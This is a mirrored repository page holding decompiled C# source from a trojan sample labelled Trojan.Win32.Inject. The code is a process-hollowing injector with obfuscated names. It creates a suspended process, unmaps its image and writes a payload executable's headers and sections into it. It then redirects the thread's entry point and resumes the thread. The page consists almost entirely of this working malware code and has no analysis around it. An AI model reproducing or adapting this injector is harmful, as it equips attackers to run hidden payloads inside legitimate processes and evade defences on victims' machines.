mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
f2ac1ece55
add
341 lines
11 KiB
C#
341 lines
11 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type:
|
|
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
|
|
|
|
using System;
|
|
using System.Runtime.InteropServices;
|
|
|
|
internal class \uE00A
|
|
{
|
|
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
|
|
private static extern IntPtr \uE000(IntPtr _param0, string _param1);
|
|
|
|
[DllImport("kernel32", EntryPoint = "GetModuleHandle")]
|
|
private static extern IntPtr \uE000(string _param0);
|
|
|
|
public static void \uE000(byte[] _param0, string _param1, string _param2)
|
|
{
|
|
\uE00A.\uE017 obj = new \uE00A.\uE017();
|
|
ref \uE00A.\uE017 local1 = ref obj;
|
|
\uE00A.\uE01B structure1 = new \uE00A.\uE01B();
|
|
ref \uE00A.\uE01B local2 = ref structure1;
|
|
\uE00A.\uE01E structure2 = new \uE00A.\uE01E();
|
|
ref \uE00A.\uE01E local3 = ref structure2;
|
|
\uE00A.\uE014 lpStartupInfo = new \uE00A.\uE014();
|
|
\uE00A.\uE015 lpProcessInformation = new \uE00A.\uE015();
|
|
\uE00A.\uE01D lpContext = new \uE00A.\uE01D();
|
|
lpStartupInfo.\uE000 = (uint) Marshal.SizeOf((object) lpStartupInfo);
|
|
lpContext.\uE000 = 65543U;
|
|
GCHandle gcHandle = GCHandle.Alloc((object) _param0, GCHandleType.Pinned);
|
|
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
|
|
gcHandle.Free();
|
|
obj = (\uE00A.\uE017) Marshal.PtrToStructure((IntPtr) int32, typeof (\uE00A.\uE017));
|
|
structure1 = (\uE00A.\uE01B) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012), typeof (\uE00A.\uE01B));
|
|
if (structure1.\uE000 != 17744U || obj.\uE000 != (ushort) 23117)
|
|
return;
|
|
\uE00A.\uE009 forFunctionPointer1 = (\uE00A.\uE009) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(73)), typeof (\uE00A.\uE009));
|
|
\uE00A.\uE00B forFunctionPointer2 = (\uE00A.\uE00B) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(88)), \uE00B.\uE000(98)), typeof (\uE00A.\uE00B));
|
|
\uE00A.\uE00C forFunctionPointer3 = (\uE00A.\uE00C) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(119)), typeof (\uE00A.\uE00C));
|
|
\uE00A.\uE00A forFunctionPointer4 = (\uE00A.\uE00A) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(134)), typeof (\uE00A.\uE00A));
|
|
\uE00A.\uE00D forFunctionPointer5 = (\uE00A.\uE00D) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(153)), typeof (\uE00A.\uE00D));
|
|
\uE00A.\uE00E forFunctionPointer6 = (\uE00A.\uE00E) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(170)), typeof (\uE00A.\uE00E));
|
|
\uE00A.\uE00F forFunctionPointer7 = (\uE00A.\uE00F) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(187)), typeof (\uE00A.\uE00F));
|
|
int num1 = forFunctionPointer1(_param2, _param1, IntPtr.Zero, IntPtr.Zero, false, \uE00A.\uE010.\uE009, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation) ? 1 : 0;
|
|
int num2 = forFunctionPointer2(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009) ? 1 : 0;
|
|
if (!forFunctionPointer3(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, structure1.\uE002.\uE013, \uE00A.\uE013.\uE000 | \uE00A.\uE013.\uE001, \uE00A.\uE012.\uE002))
|
|
return;
|
|
int num3 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, _param0, structure1.\uE002.\uE014, (object) null) ? 1 : 0;
|
|
for (int index1 = 0; index1 <= (int) structure1.\uE001.\uE001 - 1; ++index1)
|
|
{
|
|
structure2 = (\uE00A.\uE01E) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012 + Marshal.SizeOf((object) structure1) + Marshal.SizeOf((object) structure2) * index1), typeof (\uE00A.\uE01E));
|
|
byte[] lpBuffer = new byte[(IntPtr) structure2.\uE003];
|
|
for (int index2 = 0; index2 <= (int) structure2.\uE003 - 1; ++index2)
|
|
lpBuffer[index2] = _param0[(long) structure2.\uE004 + (long) index2];
|
|
int num4 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (structure1.\uE002.\uE009 + structure2.\uE002), lpBuffer, structure2.\uE003, (object) null) ? 1 : 0;
|
|
}
|
|
int num5 = forFunctionPointer5(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
|
|
byte[] bytes = BitConverter.GetBytes(structure1.\uE002.\uE009);
|
|
int num6 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (lpContext.\uE00E + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
|
|
lpContext.\uE011 = structure1.\uE002.\uE009 + structure1.\uE002.\uE006;
|
|
int num7 = forFunctionPointer6(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
|
|
int num8 = (int) forFunctionPointer7(lpProcessInformation.\uE001);
|
|
}
|
|
|
|
private delegate bool \uE009(
|
|
string lpApplicationName,
|
|
string lpCommandLine,
|
|
IntPtr lpProcessAttributes,
|
|
IntPtr lpThreadAttributes,
|
|
bool bInheritHandles,
|
|
\uE00A.\uE010 dwCreationFlags,
|
|
IntPtr lpEnvironment,
|
|
string lpCurrentDirectory,
|
|
ref \uE00A.\uE014 lpStartupInfo,
|
|
out \uE00A.\uE015 lpProcessInformation);
|
|
|
|
private delegate bool \uE00A(
|
|
IntPtr hProcess,
|
|
IntPtr lpBaseAddress,
|
|
byte[] lpBuffer,
|
|
uint nSize,
|
|
object lpNumberOfBytesWritten);
|
|
|
|
private delegate bool \uE00B(IntPtr hProcess, IntPtr lpBaseAddress);
|
|
|
|
private delegate bool \uE00C(
|
|
IntPtr hProcess,
|
|
IntPtr lpAddress,
|
|
uint dwSize,
|
|
\uE00A.\uE013 flAllocationType,
|
|
\uE00A.\uE012 flProtect);
|
|
|
|
private delegate bool \uE00D(IntPtr hThread, ref \uE00A.\uE01D lpContext);
|
|
|
|
private delegate bool \uE00E(IntPtr hThread, [In] ref \uE00A.\uE01D lpContext);
|
|
|
|
private delegate uint \uE00F(IntPtr hThread);
|
|
|
|
private enum \uE010 : uint
|
|
{
|
|
\uE00C = 1,
|
|
\uE00B = 2,
|
|
\uE009 = 4,
|
|
\uE00D = 8,
|
|
\uE002 = 16, // 0x00000010
|
|
\uE003 = 512, // 0x00000200
|
|
\uE00A = 1024, // 0x00000400
|
|
\uE007 = 2048, // 0x00000800
|
|
\uE008 = 4096, // 0x00001000
|
|
\uE00F = 65536, // 0x00010000
|
|
\uE005 = 262144, // 0x00040000
|
|
\uE00E = 524288, // 0x00080000
|
|
\uE000 = 16777216, // 0x01000000
|
|
\uE006 = 33554432, // 0x02000000
|
|
\uE001 = 67108864, // 0x04000000
|
|
\uE004 = 134217728, // 0x08000000
|
|
}
|
|
|
|
private enum \uE011 : uint
|
|
{
|
|
\uE000 = 65536, // 0x00010000
|
|
\uE001 = 65536, // 0x00010000
|
|
\uE002 = 65537, // 0x00010001
|
|
\uE003 = 65538, // 0x00010002
|
|
\uE004 = 65540, // 0x00010004
|
|
\uE008 = 65543, // 0x00010007
|
|
\uE005 = 65544, // 0x00010008
|
|
\uE006 = 65552, // 0x00010010
|
|
\uE007 = 65568, // 0x00010020
|
|
\uE009 = 65599, // 0x0001003F
|
|
}
|
|
|
|
private enum \uE012 : uint
|
|
{
|
|
\uE004 = 1,
|
|
\uE005 = 2,
|
|
\uE006 = 4,
|
|
\uE007 = 8,
|
|
\uE000 = 16, // 0x00000010
|
|
\uE001 = 32, // 0x00000020
|
|
\uE002 = 64, // 0x00000040
|
|
\uE003 = 128, // 0x00000080
|
|
\uE008 = 256, // 0x00000100
|
|
\uE009 = 512, // 0x00000200
|
|
\uE00A = 1024, // 0x00000400
|
|
}
|
|
|
|
private enum \uE013 : uint
|
|
{
|
|
\uE000 = 4096, // 0x00001000
|
|
\uE001 = 8192, // 0x00002000
|
|
\uE002 = 524288, // 0x00080000
|
|
\uE005 = 1048576, // 0x00100000
|
|
\uE006 = 2097152, // 0x00200000
|
|
\uE004 = 4194304, // 0x00400000
|
|
\uE003 = 536870912, // 0x20000000
|
|
}
|
|
|
|
private struct \uE014
|
|
{
|
|
public uint \uE000;
|
|
public string \uE001;
|
|
public string \uE002;
|
|
public string \uE003;
|
|
public uint \uE004;
|
|
public uint \uE005;
|
|
public uint \uE006;
|
|
public uint \uE007;
|
|
public uint \uE008;
|
|
public uint \uE009;
|
|
public uint \uE00A;
|
|
public uint \uE00B;
|
|
public short \uE00C;
|
|
public short \uE00D;
|
|
public IntPtr \uE00E;
|
|
public IntPtr \uE00F;
|
|
public IntPtr \uE010;
|
|
public IntPtr \uE011;
|
|
}
|
|
|
|
private struct \uE015
|
|
{
|
|
public IntPtr \uE000;
|
|
public IntPtr \uE001;
|
|
public uint \uE002;
|
|
public uint \uE003;
|
|
}
|
|
|
|
private struct \uE016
|
|
{
|
|
public int \uE000;
|
|
public IntPtr \uE001;
|
|
public bool \uE002;
|
|
}
|
|
|
|
private struct \uE017
|
|
{
|
|
public ushort \uE000;
|
|
public ushort \uE001;
|
|
public ushort \uE002;
|
|
public ushort \uE003;
|
|
public ushort \uE004;
|
|
public ushort \uE005;
|
|
public ushort \uE006;
|
|
public ushort \uE007;
|
|
public ushort \uE008;
|
|
public ushort \uE009;
|
|
public ushort \uE00A;
|
|
public ushort \uE00B;
|
|
public ushort \uE00C;
|
|
public ushort \uE00D;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|
public ushort[] \uE00E;
|
|
public ushort \uE00F;
|
|
public ushort \uE010;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|
public ushort[] \uE011;
|
|
public int \uE012;
|
|
}
|
|
|
|
private struct \uE018
|
|
{
|
|
public ushort \uE000;
|
|
public ushort \uE001;
|
|
public uint \uE002;
|
|
public uint \uE003;
|
|
public uint \uE004;
|
|
public ushort \uE005;
|
|
public ushort \uE006;
|
|
}
|
|
|
|
private struct \uE019
|
|
{
|
|
public uint \uE000;
|
|
public uint \uE001;
|
|
}
|
|
|
|
private struct \uE01A
|
|
{
|
|
public ushort \uE000;
|
|
public byte \uE001;
|
|
public byte \uE002;
|
|
public uint \uE003;
|
|
public uint \uE004;
|
|
public uint \uE005;
|
|
public uint \uE006;
|
|
public uint \uE007;
|
|
public uint \uE008;
|
|
public uint \uE009;
|
|
public uint \uE00A;
|
|
public uint \uE00B;
|
|
public ushort \uE00C;
|
|
public ushort \uE00D;
|
|
public ushort \uE00E;
|
|
public ushort \uE00F;
|
|
public ushort \uE010;
|
|
public ushort \uE011;
|
|
public uint \uE012;
|
|
public uint \uE013;
|
|
public uint \uE014;
|
|
public uint \uE015;
|
|
public ushort \uE016;
|
|
public ushort \uE017;
|
|
public uint \uE018;
|
|
public uint \uE019;
|
|
public uint \uE01A;
|
|
public uint \uE01B;
|
|
public uint \uE01C;
|
|
public uint \uE01D;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|
public \uE00A.\uE019[] \uE01E;
|
|
}
|
|
|
|
private struct \uE01B
|
|
{
|
|
public uint \uE000;
|
|
public \uE00A.\uE018 \uE001;
|
|
public \uE00A.\uE01A \uE002;
|
|
}
|
|
|
|
private struct \uE01C
|
|
{
|
|
public uint \uE000;
|
|
public uint \uE001;
|
|
public uint \uE002;
|
|
public uint \uE003;
|
|
public uint \uE004;
|
|
public uint \uE005;
|
|
public uint \uE006;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|
public byte[] \uE007;
|
|
public uint \uE008;
|
|
}
|
|
|
|
private struct \uE01D
|
|
{
|
|
public uint \uE000;
|
|
public uint \uE001;
|
|
public uint \uE002;
|
|
public uint \uE003;
|
|
public uint \uE004;
|
|
public uint \uE005;
|
|
public uint \uE006;
|
|
public \uE00A.\uE01C \uE007;
|
|
public uint \uE008;
|
|
public uint \uE009;
|
|
public uint \uE00A;
|
|
public uint \uE00B;
|
|
public uint \uE00C;
|
|
public uint \uE00D;
|
|
public uint \uE00E;
|
|
public uint \uE00F;
|
|
public uint \uE010;
|
|
public uint \uE011;
|
|
public uint \uE012;
|
|
public uint \uE013;
|
|
public uint \uE014;
|
|
public uint \uE015;
|
|
public uint \uE016;
|
|
public uint \uE017;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|
public byte[] \uE018;
|
|
}
|
|
|
|
private struct \uE01E
|
|
{
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
|
|
public byte[] \uE000;
|
|
public uint \uE001;
|
|
public uint \uE002;
|
|
public uint \uE003;
|
|
public uint \uE004;
|
|
public uint \uE005;
|
|
public uint \uE006;
|
|
public ushort \uE007;
|
|
public ushort \uE008;
|
|
public uint \uE009;
|
|
}
|
|
}
|